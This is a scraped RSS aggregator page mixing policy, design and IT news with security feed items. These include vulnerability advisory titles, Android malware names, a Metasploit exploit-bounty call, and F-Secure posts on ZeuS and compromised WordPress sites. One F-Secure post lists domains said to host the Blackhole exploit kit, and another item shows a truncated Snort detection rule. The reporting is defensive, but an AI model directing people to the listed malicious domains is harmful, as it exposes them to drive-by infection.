Channel Image14:56 CDT Testifies on Reevaluating REAL ID Act» Center for Democracy and Technology
CDT testified Wednesday before the Senate Committee on Homeland Security and Governmental Affairs hearing on reevaluating the REAL ID Act. CDT testified in support of the PASS ID Act, noting that it mitigates or corrects critical privacy and security flaws introduced by REAL ID, while still establishing minimum federal standards for the issuance of driver's licenses and ID cards. While the PASS ID Act does not address all flaws in the REAL ID program, merely repealing REAL ID does not address all of the underlying privacy and security risks posed by government identification programs, CDT said. PASS ID provides the opportunity to start building privacy guidance and protections into all state identification programs, addressing trends and issues that will exist regardless of REAL ID implementation.
Channel Image14:56 CDT Releases Updated Report on Privacy Controls for Web Browsers» Center for Democracy and Technology
CDT today released an update to the browser report it issued in October of 2008. The report includes updated information about privacy tools available in five Web Browsers – Firefox 3.5, Internet Explorer 8, Google Chrome, Safari 4, and Opera 10. The report compares browser offerings in three key areas: privacy mode, cookie controls and object controls. Each of those, when used correctly, can greatly reduce the amount of personal information users transmit online.
Channel Image14:56 CDT Releases Report on Privacy Concerns Surrounding Government Cybersecurity System» Center for Democracy and Technology
The Center for Democracy & Technology today released a report outlining a series of privacy and legal questions that surround the government computer monitoring system known as "Einstein." The report calls on the Administration to release information about the legal authority for Einstein, the role of the nation's top spy agency, the National Security Agency, in its development and operation, and the impact of Einstein on privacy.
Channel Image14:56 CDT Releases Privacy Recommendations Report for Google Book Service» Center for Democracy and Technology
CDT today released a report analyzing the privacy risks associated with the proposed expansion of Google Book Search. The report urges Google to commit to a strong privacy regime for the new service in advance of the settlement fairness hearing this fall. The tentative settlement between Google and publishers, the result of a copyright infringement lawsuit, would dramatically alter the way the public obtains and interacts with books. The report asks the court to approve the settlement but to retain oversight in order to monitor implementation of a privacy plan.
Channel Image14:56 CDT Files Reply Comments on FCC Broadband Plan» Center for Democracy and Technology
CDT filed a second round of comments today in the FCC proceeding to create a national broadband plan. CDT emphasized that the broadband plan should expressly affirm key elements of the Internet's successful policy framework. CDT also offered responses to a variety of arguments raised by other commenters on topics such as nondiscrimination, network management, the regulatory treatment of wireless broadband, active ISP policing of copyright infringement, and the role of self-regulation in protecting user privacy.
Channel Image14:56 CDT Comments on Federal Web Policy Proposal» Center for Democracy and Technology
CDT and EFF today submitted joint comments to the Office of Management and Budget in response to the agency's proposed review of the policies governing the use of cookies and other web technologies. OMB's suggested framework begins to address some of the deficiencies regarding current federal policy; however, the final version of the policy must include more granular and comprehensive privacy protections, CDT and EFF said in joint comments. Agency Web sites play a key role in fostering a more participatory government, but with changes in technology and policy special attention should be given to privacy issues. Many of the ideas and recommendations contained in the comments are based on a recently released CDT-EFF report about the use of analytics on government web sites.
Channel Image14:56 CDT Announces Non-Resident Fellows Program» Center for Democracy and Technology
With the designation of ten distinguished academics, the Center for Democracy & Technology today announced the creation of a non-resident Fellows Program, designed to bring fresh insight and the latest in academic research to CDT’s work. The program provides an opportunity for leading scholars to collaborate with CDT staff in addressing the complex legal and policy issues facing the Internet. In the past, CDT had several associated Fellows, but the relationship was informal. The announcement today formalizes the fellowship system, strengthening CDT’s cross-disciplinary approach to its mission: keeping the Internet open, innovative and free.
Channel Image14:56 Building Twitter Bootstrap» A List Apart
Bootstrap is an open-source front-end toolkit created to help designers and developers quickly and efficiently build great stuff online. Its goal is to provide a refined, well-documented, and extensive library of flexible design components created with HTML, CSS, and JavaScript for others to build and innovate on. Today, it has grown to include dozens of components and has become the most popular project on GitHub, with more than 13,000 watchers and 2,000 forks. Mark Otto, the co-creator of Bootstrap, sheds light on how and why Bootstrap was made, the processes used to create it, and how it has grown as a design system.
Channel Image14:56 Bugtraq: ZDI-11-261: HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution Vulnerability» recent infosec news
ZDI-11-261: HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution Vulnerability
Channel Image14:56 Bugtraq: ZDI-11-260: Nortel Media Application Server cstore.exe cs_anams Remote Code Execution Vulnerability» recent infosec news
ZDI-11-260: Nortel Media Application Server cstore.exe cs_anams Remote Code Execution Vulnerability
Channel Image14:56 Bugtraq: ZDI-11-259: Apple QuickTime STSZ atom Parsing Remote Code Execution Vulnerability» recent infosec news
ZDI-11-259: Apple QuickTime STSZ atom Parsing Remote Code Execution Vulnerability
Channel Image14:56 Bugtraq: ZDI-11-258: Apple QuickTime STSC atom Parsing Remote Code Execution Vulnerability» recent infosec news
ZDI-11-258: Apple QuickTime STSC atom Parsing Remote Code Execution Vulnerability
Channel Image14:56 Bounty: 30 Exploits, $5,000.00, in 5 weeks» Metasploit

The Metasploit team is excited to announce a new incentive for community exploit contributions: Cash! Running until July 20th, our Exploit Bounty program will pay out $5,000 in cash awards (in the form of American Express gift cards) to any community member that submits an accepted exploit module for an item from our Top 5 or Top 25 exploit lists. This is our way of saying thanks to the open source exploit development community and encouraging folks who may not have written Metasploit modules before to give it a try.

 

All accepted submissions will be available under the standard Metasploit Framework license (3-clause BSD). Exploit selection is first-come, first-serve; please see the official rules for more information.


Contributors will have a chance to claim a vulnerability from the Top 25 ($100) and Top 5 ($500) lists. Once a vulnerability has been claimed the contributor will be given one week to work on a module. After a week the vulnerability will be open again to the community. Prizes will only be paid out to the first module contributor for a given vulnerability. The process of claiming a vulnerability is an attempt at limiting situations where multiple contributors submit modules for the same vulnerability. To stake a claim, send an email to bounty@metasploit.com with the name of the vulnerability from the list below. All claims will be acknowledged, so please wait until receiving the acknowledgement before starting on the exploit. Each contributor can only have one outstanding claim at a time.

 

If you need help with the Metasploit module format, feel free to drop by our IRC channel (#metasploit on irc.freenode.net), and take a look at the some of the community documents:


 

Thanks and have fun!

 

-HD

Channel Image14:56 Being Knitted Together...» Hacking for Christ
For You created my inmost being; You knit me together in my mother's womb. I praise You because I am fearfully and wonderfully made; Your works are wonderful, I know that full well. My frame was not hidden from You when I was made in the secret place. When I was woven together in the depths of the earth, Your eyes saw my unformed body. All the days ordained for me were written in Your book before one of them came to be. -- Psalm 139, 13-16 He or she is expected to emerge at the end of January 2012. :-)...
Channel Image14:56 Audiences, Outcomes, and Determining User Needs» A List Apart
Every website needs an audience. And every audience needs a goal. Advocating for end-user needs is the very foundation of the user experience disciplines. We make websites for real people. Those real people are able to do real things. But how do we get to really know our audience and find out what these mystery users really want from our sites and applications? Learn to ensure that every piece of content on your site relates back to a specific, desired outcome — one that achieves business goals by serving the end user. Corey Vilhauer explains the threads that bind UX research to content strategy and project deliverables that deliver.
Channel Image14:56 Artist Makes Drawing 'Bot Out of Hacked Turntables» Wired Top Stories
Two ordinary turntables are hacked to make drawings in the compelling art project ?Drawing Apparatus.? The drawings produced by the contraption resemble old Spirograph images, and the simple DIY design of the device has an appealing vintage look and feel.


Channel Image14:56 Are Working Mothers Happier?» HowStuffWorks Daily Feed
To work or not to work? That question has evolved into a guilt-inducing, tension-provoking division among mothers, continually rehashed in venues from the playground to Congressional hearings. When it comes down to it, which moms are really happiest?


Channel Image14:56 AndroidOS_ROOTER.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 Android and Security» Google Online Security Blog


We frequently get asked about how we defend Android users from malware and other threats. As the Android platform continues its tremendous growth, people wonder how we can maintain a trustworthy experience with Android Market while preserving the openness that remains a hallmark of our overall approach. We’ve been working on lots of defenses, and they have already made a real and measurable difference for our users’ security. Read more about how we defend against malware in Android Market on the Google Mobile Blog here.
Channel Image14:56 An update on attempted man-in-the-middle attacks» Google Online Security Blog


Today we received reports of attempted SSL man-in-the-middle (MITM) attacks against Google users, whereby someone tried to get between them and encrypted Google services. The people affected were primarily located in Iran. The attacker used a fraudulent SSL certificate issued by DigiNotar, a root certificate authority that should not issue certificates for Google (and has since revoked it).

Google Chrome users were protected from this attack because Chrome was able to detect the fraudulent certificate.

To further protect the safety and privacy of our users, we plan to disable the DigiNotar certificate authority in Chrome while investigations continue. Mozilla also moved quickly to protect its users. This means that Chrome and Firefox users will receive alerts if they try to visit websites that use DigiNotar certificates. Microsoft also has taken prompt action.

To help deter unwanted surveillance, we recommend that users, especially those in Iran, keep their web browsers and operating systems up to date and pay attention to web browser security warnings.

Update Aug 30: Added information about Microsoft's response.

Update Sept 3: Our top priority is to protect the privacy and security of our users. Based on the findings and decision of the Dutch government, as well as conversations with other browser makers, we have decided to reject all of the Certificate Authorities operated by DigiNotar. We encourage DigiNotar to provide a complete analysis of the situation.
Channel Image14:56 An Important Time for Design» A List Apart
Design is on a roll. Client services are experiencing a major uptick in demand, seasoned design professionals are abandoning client work in favor of entrepreneurship, and designer-co-founded startups such as Kickstarter and Airbnb are taking center stage. It’s becoming increasingly difficult to ignore the fact that design has a massive role to play in the evolution of the web and the next generation of web products. The result, says Cameron Koczon, is that designers have now been given a blank check—one that lets web designers band together as a community to change the way design is perceived; change the way products are built; and quite possibly change the world.
Channel Image14:56 Air Mozilla Awesomeness» Hacking for Christ
Air Mozilla recently got an upgrade, with HD cameras in 10 Forward (the main meeting space in the Mountain View office), direct feeds from the projector, video mixing and WebM streaming. The result is much clearer video, in HD if you want it (1280x720 if your internet connection can handle 2.5Mbit/s), slides you can actually read mixed in alongside that video, far fewer A/V problems, being able to actually see the faces of new people and, in general, a much more pleasant meeting experience. If you've given up attending the Monday project meeting due to technical issues, I urge you to give it another go :-) Kudos to Jono, Asa, Tiffney, the Mozilla IT team, and anyone else involved along the way in making this all happen....
Channel Image14:56 Advanced sign-in security for your Google account» Google Online Security Blog


(Cross-posted from the Official Google Blog)

Has anyone you know ever lost control of an email account and inadvertently sent spam—or worse—to their friends and family? There are plenty of examples (like the classic "Mugged in London" scam) that demonstrate why it's important to take steps to help secure your activities online. Your Gmail account, your photos, your private documents—if you reuse the same password on multiple sites and one of those sites gets hacked, or your password is conned out of you directly through a phishing scam, it can be used to access some of your most closely-held information.

Most of us are used to entrusting our information to a password, but we know that some of you are looking for something stronger. As we announced to our Google Apps customers a few months ago, we've developed an advanced opt-in security feature called 2-step verification that makes your Google Account significantly more secure by helping to verify that you're the real owner of your account. Now it's time to offer the same advanced protection to all of our users.

2-step verification requires two independent factors for authentication, much like you might see on your banking website: your password, plus a code obtained using your phone. Over the next few days, you'll see a new link on your Account Settings page that looks like this:



Take your time to carefully set up 2-step verification—we expect it may take up to 15 minutes to enroll. A user-friendly set-up wizard will guide you through the process, including setting up a backup phone and creating backup codes in case you lose access to your primary phone. Once you enable 2-step verification, you'll see an extra page that prompts you for a code when you sign in to your account. After entering your password, Google will call you with the code, send you an SMS message or give you the choice to generate the code for yourself using a mobile application on your Android, BlackBerry or iPhone device. The choice is up to you. When you enter this code after correctly submitting your password we'll have a pretty good idea that the person signing in is actually you.


It's an extra step, but it's one that significantly improves the security of your Google Account because it requires the powerful combination of both something you know—your username and password—and something that only you should have—your phone. A hacker would need access to both of these factors to gain access to your account. If you like, you can always choose a "Remember verification for this computer for 30 days" option, and you won't need to re-enter a code for another 30 days. You can also set up one-time application-specific passwords to sign in to your account from non-browser based applications that are designed to only ask for a password, and cannot prompt for the code.

To learn more about 2-step verification and get started, visit our Help Center. And for more about staying safe online, see our ongoing security blog series or visit http://www.staysafeonline.org/. Be safe!

Update Dec 7, 2011: Updated the screenshots in this post.
Channel Image14:56 Absence Notice» Hacking for Christ
I will be offline from tomorrow, Saturday 30th July, until at least Monday 8th August, doing this and other things....
Channel Image14:56 AT&T exec blames FCC for T-Mobile layoffs» Network World NetFlash
James Cicconi knows whom T-Mobile workers should blame for their company's recently announced layoffs: the FCC.
Channel Image14:56 ASCII Artists of the World UNITE!» Metasploit

Are you an artist?  Do you possess mad ASCII art skills?  Do you like the idea of having your artwork on the face of an open source project that's one of the world's largest, de-facto standard for penetration testing with more than one million unique downloads per year?  Then read on!

 

One of the first things many people likely noticed when updating to the Metasploit Framework version 4.0-testing was the new ASCII art. In addition to all the new awesome features we have been adding to Metasploit lately we wanted to give Metasploit a new look and appearance. When version 4.0-test first came out we had roughly 5 or 6 new banners. Slowly we have been adding to that number.  Now is your chance to make your mark on the Metasploit Project.

 

The Metasploit team would like to encourage the talented folks from every corner of the community to join the ASCII art fun, and submit your most awesome, creative banners to us. All submissions should be uploaded to either Metasploit Redmine (http://dev.metasploit.com), or e-mailed to msfdev@metasploit.com. If selected, your artwork will be committed in our banner.rb file, together with the following banners that we currently have:

 

Metasploit-Matrix.pngmissle_command.png

Kernel panic.pngR7-Metasploit.png3Kom Superhack.pngI Love Shells.pngMetasploit Bull.pngModern Cowsay.png

 

For questions, as always, please feel free to drop by our IRC channel (#metasploit on irc.freenode.net).

Channel Image14:56 APPLE-SA-2012-03-12-1 Safari 5.1.4» security-announce Mailing List
From: Apple Product Security
Reply to list

APPLE-SA-2012-03-12-1 Safari 5.1.4

Safari 5.1.4 is now available and addresses the following:

Safari
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Look-alike characters in a URL could be used to masquerade a
website
Description:  The International Domain Name (IDN) support in Safari [...]
Channel Image14:56 APPLE-SA-2012-03-07-3 Apple TV 5.0» security-announce Mailing List
From: Apple Product Security
Reply to list

APPLE-SA-2012-03-07-3 Apple TV 5.0

Apple TV 5.0 is now available and addresses the following:

Apple TV
Available for:  Apple TV (2nd generation)
Impact:  Applications that use the libresolv library may be
vulnerable to an unexpected application termination or arbitrary code
execution [...]
Channel Image14:56 APPLE-SA-2012-03-07-2 iOS 5.1 Software Update» security-announce Mailing List
From: Apple Product Security
Reply to list

APPLE-SA-2012-03-07-2 iOS 5.1 Software Update

iOS 5.1 Software Update is now available and addresses the following:

CFNetwork
Available for:  iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact:  Visiting a maliciously crafted website may lead to the [...]
Channel Image14:56 APPLE-SA-2012-03-07-1 iTunes 10.6» security-announce Mailing List
From: Apple Product Security
Reply to list

APPLE-SA-2012-03-07-1 iTunes 10.6

iTunes 10.6 is now available and addresses the following:

WebKit
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  A man-in-the-middle attack while browsing the iTunes Store
via iTunes may lead to an unexpected application termination or [...]
Channel Image14:56 ANDROIDOS_LOTOOR.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_GEINIMI.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_GEINIMI.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_FAKEMOBI.D» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_FAKEMOBI.B» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_DROISNAKE.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_DROIDSMS.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 ANDROIDOS_BGSERV.A» Trend Micro - Newest Malware Advisories
Low
Channel Image14:56 A Google-a-Day Puzzle for Mar. 26» Wired Top Stories
Google's daily brainteaser helps hone your search skills.


Channel Image14:56 A Google-a-Day Puzzle for Mar. 25» Wired Top Stories
Google's daily brainteaser helps hone your search skills.


Channel Image14:56 A Google-a-Day Puzzle for Mar. 24» Wired Top Stories
Google's daily brainteaser helps hone your search skills.


Channel Image14:56 Hunger Games Star Shoots to Top of Action Heroine Hot List» Wired Top Stories
With her trusty bow and arrow, reality-show sharpshooter Katniss drives The Hunger Games with a fierce tomboy energy rarely seen on the big screen. She joins a long line of heroines who made their mark in the guy-centric universe of action, sci-fi and horror.


Channel Image14:56 2-step verification: stay safe around the world in 40 languages» Google Online Security Blog


(Cross-posted from the Official Google Blog)

Earlier this year, we introduced a security feature called 2-step verification that helps protect your Google Account from threats like password compromise and identity theft. By entering a one-time verification code from your phone after you type your password, you can make it much tougher for an unauthorized person to gain access to your account.

People have told us how much they like the feature, which is why we're thrilled to offer 2-step verification in 40 languages and in more than 150 countries. There’s never been a better time to set it up: Examples in the news of password theft and data breaches constantly remind us to stay on our toes and take advantage of tools to properly secure our valuable online information. Email, social networking and other online accounts still get compromised today, but 2-step verification cuts those risks significantly.

We recommend investing some time in keeping your information safe by watching our 2-step verification video to learn how to quickly increase your Google Account’s resistance to common problems like reused passwords and malware and phishing scams. Wherever you are in the world, sign up for 2-step verification and help keep yourself one step ahead of the bad guys.

To learn more about online safety tips and resources, visit our ongoing security blog series, and review a couple of simple tips and tricks for online security. Also, watch our video about five easy ways to help you stay safe and secure as you browse.

Update on 12/1/11: We recently made 2-step verification available for users in even more places, including Iran, Japan, Liberia, Myanmar (Burma), Sudan and Syria. This enhanced security feature for Google Accounts is now available in more than 175 countries.
Channel Image14:56 10 Things Parents Should Know About The Hunger Games» Wired Top Stories
The big screen adaptation of the popular young adult title is beautifully faithful to its source, but is that a good thing when it comes to letting younger kids watch it?


Channel Image14:56 10 Gadgets for Your Next Road Trip» HowStuffWorks Daily Feed
Thanks to a booming technology industry that caters to people on the go, the comforts of home may soon take a backseat to their travel alternatives. What gadgets should you bring on your next road trip?


Channel Image14:56 [3/5] Swann DVR4-SecuraNet Directory Traversal Vulnerability » Latest Secunia Advisories
Terry Froy has reported a vulnerability in Swann DVR4-SecuraNet, which can be exploited by malicious people to disclose sensitive information.

http://secunia.com/Advisories/33861/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [3/5] PHP Krazy Image Host Script "id" SQL Injection Vulnerability » Latest Secunia Advisories
x0r has discovered a vulnerability in PHP Krazy Image Host Script, which can be exploited by malicious people to conduct SQL injection attacks.

http://secunia.com/Advisories/33930/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [3/5] Gentoo update for openssl » Latest Secunia Advisories
Gentoo has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious people to conduct spoofing attacks.

http://secunia.com/Advisories/33916/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [3/5] Free Joke Script Multiple SQL Injection Vulnerabilities » Latest Secunia Advisories
MuhaciR has reported some vulnerabilities in Free Joke Script, which can be exploited by malicious people to conduct SQL injection attacks.

http://secunia.com/Advisories/33929/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [3/5] Fedora update for fail2ban » Latest Secunia Advisories
Fedora has issued an update for fail2ban. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

http://secunia.com/Advisories/33942/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [3/5] Fedora update for dnsmasq » Latest Secunia Advisories
Fedora has issued an update for dnsmasq. This fixes a security issue and a vulnerability, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges and malicious people to poison the DNS cache.

http://secunia.com/Advisories/33943/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] UniversalIndentGUI "SettingsPaths::init()" Insecure Temporary Files » Latest Secunia Advisories
A security issue has been reported in UniversalIndentGUI, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

http://secunia.com/Advisories/33932/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] Sun Solaris / SEAM Kerberos PAM Module Privilege Escalation » Latest Secunia Advisories
Sun has acknowledged a vulnerability in Solaris and Sun Enterprise Authentication Mechanism (SEAM), which can be exploited by malicious, local users to gain escalated privileges.

http://secunia.com/Advisories/33921/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] Sun Java System Directory Server Directory Proxy Server Denial of Service » Latest Secunia Advisories
A vulnerability has been reported in Sun Java System Directory Server, which can be exploited by malicious, local users and malicious people to cause a DoS (Denial of Service).

http://secunia.com/Advisories/33923/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] Openfiler "redirect" Cross-Site Scripting Vulnerability » Latest Secunia Advisories
Dejan Levaja has discovered a vulnerability in Openfiler, which can be exploited by malicious people to conduct cross-site scripting attacks.

http://secunia.com/Advisories/33681/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] IBM WebSphere Application Server "PerfServlet" Information Disclosure » Latest Secunia Advisories
A vulnerability has been reported in IBM WebSphere Application Server, which can be exploited by malicious people to disclose potentially sensitive information.

http://secunia.com/Advisories/33934/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] IBM HTTP Server "mod_proxy_ftp" Cross-Site Scripting Vulnerability » Latest Secunia Advisories
A vulnerability has been reported in IBM HTTP Server, which can be exploited by malicious people to conduct cross-site scripting attacks.

http://secunia.com/Advisories/33933/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] Debian update for websvn » Latest Secunia Advisories
Debian has issued an update for websvn. This fixes a vulnerability, which can be exploited by malicious users to disclose sensitive information.

http://secunia.com/Advisories/33945/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [2/5] Debian update for moodle » Latest Secunia Advisories
Debian has issued an update for moodle. This fixes some security issues and vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges and by malicious users to conduct script insertion attacks.

http://secunia.com/Advisories/33955/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 [1/5] Gentoo update for valgrind » Latest Secunia Advisories
Gentoo has issued an update for valgrind. This fixes a security issue, which can be exploited by malicious, local users to gain escalated privileges.

http://secunia.com/Advisories/33913/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Channel Image14:56 win2k.sys / new / 16th Apr / (NT)» Security BugWare
Windows 2003 win2k.sys vulnerability
Channel Image14:56 veritas backupExec / new / 16th Apr / (NT)» Security BugWare
Veritas BackupExec 9.0 is vulnerable to Slammer worm
Channel Image14:56 snort / new / 16th Apr / (Other)» Security BugWare
Snort TCP Stream Reassembly Integer Overflow Vulnerability
Channel Image14:56 ps2epsi / new / 16th Apr / (Other)» Security BugWare
ps2epsi insecure temporary file creation
Channel Image14:56 openSUSE 11.3 kernel security update» SUSE Security Announcements
23 Sep 2010
Channel Image14:56 openSUSE 11.2 kernel security update» SUSE Security Announcements
23 Sep 2010
Channel Image14:56 lprng / new / 16th Apr / (mUNIXes)» Security BugWare
lprng insecure temporary file creation
Channel Image14:56 kernel / update / 17th Mar / (Linux)» Security BugWare
Linux local root exploit via ptrace
Channel Image14:56 inux kernel security problems» SUSE Security Announcements
28 Oct 2010
Channel Image14:56 gtkHTML / new / 16th Apr / (Other)» Security BugWare
gtkHTML misshandling of malformed messages
Channel Image14:56 glibc security problems» SUSE Security Announcements
28 Oct 2010
Channel Image14:56 flash player security problems» SUSE Security Announcements
23 Sep 2010
Channel Image14:56 exim remote code execution» SUSE Security Announcements
13 Dec 2010
Channel Image14:56 eog / new / 16th Apr / (Other)» Security BugWare
Eye of GNOME (EOG) arbitrary code execution
Channel Image14:56 bind remote denial of service» SUSE Security Announcements
08 Jul 2011
Channel Image14:56 ZeuS: Me Talk Pretty Finnish One Day» F-Secure Antivirus Research Weblog
A couple of months ago, there was an overly polite variant of ZeuS circulating here in Finland. And while the Finnish localization was pretty good — it used "Suo anteeksi" within an error message… not typically the kind of thing you'd read via software.

We continue to see decent localization within ZeuS variants (and not just Finnish). Clearly, some bad guys out there have evolved from Google Translate, which is the level of localization we used to expect in the past.

But the bad guys still make basic mistakes. One variant of ZeuS, which is circulating now, includes a Finn's name within the localized efforts. Instead of stating "Welcome Bank Customer", the trojan declares "Welcome name withheld".

Here are some of the banks that are being targeted.

zeus configuration, bank list

For banks that use Java applications, this ZeuS appears to attempt a replace and imitate approach. (Our analysis is ongoing.)

The server which hosted the configuration file (from which the screenshot was taken) has been taken offline, so this variant can infect, but cannot download the locations of its Command & Control servers. Unfortunately, any computers infected last week will have downloaded a configuration file that includes lots of redundant server names.

But fortunately… most of the banks that we've worked with in the past have extensive transaction controls on their back end systems. So it isn't just a simple thing for the ZeuS trojan to transfer funds from the account of somebody with an infected computer.

Best advice: update your computer software to avoid infection. Also: avoid haphazard web searches. There are tons of compromised sites out there, and you're most likely to fall into a trap when you're searching for something.

Best advice for those infected: don't panic. If you see something that looks unusual in your online bank account, it's not too late to block the bad guys. Call your bank's customer support and they'll be able to assist.






On 19/03/12 At 05:27 PM

Channel Image14:56 Xsigo dévoile un logiciel de mise en réseau virtuelle pour datacenters» Actualités Réseaux
Avec Server Fabric, Xsigo étend sa technologie de virtualisation des entrées/sorties au-delà des racks de serveurs individuels : désormais, ses unités (...)
Channel Image14:56 XBMC 11.0 released» OSNews
"XBMC 11.0 Milestones include Addon Rollbacks, vast improvements in Confluence (the default skin), massive speed increases via features like Dirty-region rendering and the new JPEG decoder, a simpler, better library, movie set scraping, additional protocol handling, better networking support, better handling of unencrypted BluRay content and structures, adjustable display refresh rate in OSX (to match the already available feature in Windows and Linux), AirPlay support, an upgraded weather service with geoip lookup, and much, much more. Check out the highlights in the summarized changelog."
Channel Image14:56 X.org / X11 security update» SUSE Security Announcements
13 Apr 2011
Channel Image14:56 WordPress Page is Loading... an Exploit» F-Secure Antivirus Research Weblog
WordPress.org is being targeted once again, and although this time there isn't much sneaky sophistication, the infection is still prevalent enough for Internet users to be wary.

Spam appears to be the driver of these campaigns. Various websites have already been identified to be redirecting to Blackhole exploit kit. Compromised websites would render any of the following pages upon visit:

tuit html

quick html

opek html

irta html

company html

aic html

Simple and unsuspecting… but really, in an age in which beautifully crafted websites are the norm, these fakes are just too plain to be the real deal…

And indeed they aren't…

Browsing Protection Result

Currently, these sites redirect to the following domains that host Blackhole exploit kit:

  •  georgekinsman.net
  •  icemed.net
  •  mynourigen.net
  •  synergyledlighting.net
  •  themeparkoupons.net

Be wary of where you're clicking, folks. Safe browsing everyone!

Threat Insight post by — Karmina

On 15/03/12 At 05:02 PM

Channel Image14:56 Wired UK: The Digital Detective» F-Secure Antivirus Research Weblog
Wired UK's Greg Williams' profile of Mikko is now available at wired.co.uk.

The Digital Detective

There's also a very nice online gallery of images used by the iPad/print editions of the article.






On 20/03/12 At 12:22 PM

Channel Image14:56 Windows 98 Snort Signature» Bleeding Edge Threats
Win98 isn’t a security threat in itself… well mostly. But a LOT of spyware and downloaders still use old static User-Agent strings that identify them as Windows 98. So the following sig is out, it’s thresholded to keep the numbers down in case you run across Win98 boxes you weren’t aware of. alert tcp $HOME_NET [...]
Channel Image14:56 Virtualisation : Red Hat libère RHEV de son lien à Windows» Actualités Open Source
Avec RHEV 3.0, la prochaine mouture de sa plateforme de virtualisation, Red Hat s'affranchit de sa dépendance à Windows Server et SQL Server de Microsoft. (...)


Channel Image14:56 Un programme de recyclage des Mac et PC chez Apple» Actualités Poste de travail
Apple s'est engagé à trouver les moyens les plus efficaces de réutiliser ou de recycler des équipements électroniques en fin de vie, y compris ceux conçus  (...)
Channel Image14:56 Ubuntu Server 11.04 se pare de ses habits Cloud» Actualités Open Source
Le projet Natty Nahrwal se transforme définitivement en Ubuntu 11.04 le 28 avril. A cette date-là, la version server sera aussi disponible. Les grandes (...)


Channel Image14:56 Trying NetworkMiner Professional 1.2» TaoSecurity
